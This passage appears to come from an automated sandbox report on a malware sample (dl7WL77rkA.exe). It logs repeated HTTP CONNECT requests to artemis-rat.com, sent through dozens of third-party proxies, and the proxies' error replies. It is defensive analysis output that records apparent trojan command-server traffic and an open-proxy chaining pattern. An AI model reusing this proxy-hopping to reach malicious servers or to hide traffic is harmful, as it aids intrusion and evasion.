                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            37192.168.2.54991145.12.31.3803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.568027973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.722847939 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            38192.168.2.549923162.159.242.7803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.577557087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.738769054 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            39192.168.2.549946104.21.85.109803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.580738068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.734850883 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            40192.168.2.549863134.209.29.12031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.580898046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.740596056 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            41192.168.2.549837103.23.101.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.593560934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            42192.168.2.549931162.214.121.173645793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.604768038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            43192.168.2.5499345.78.65.91803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.613709927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.811405897 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            44192.168.2.54989351.15.230.100163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.642817020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.279825926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.883793116 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            45192.168.2.54996238.7.18.10280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.643650055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.860241890 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            46192.168.2.549868103.107.84.12480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.658664942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.022778988 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            47192.168.2.54997051.222.241.157225383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.662381887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.186081886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.842346907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139267921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.905107021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.499165058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093183041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            48192.168.2.55008442.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.663938046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            49192.168.2.55008742.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.664611101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            50192.168.2.55009042.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.666461945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            51192.168.2.55009542.116.10.1964433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.667911053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            52192.168.2.54988920.24.43.21481233876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.670852900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.012877941 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            53192.168.2.54998338.162.4.24231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.673753023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.088875055 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            54192.168.2.54993098.162.25.2341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.678803921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            55192.168.2.549933161.132.125.24480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:37.703052044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.311095953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.139219999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.779866934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092811108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.405335903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
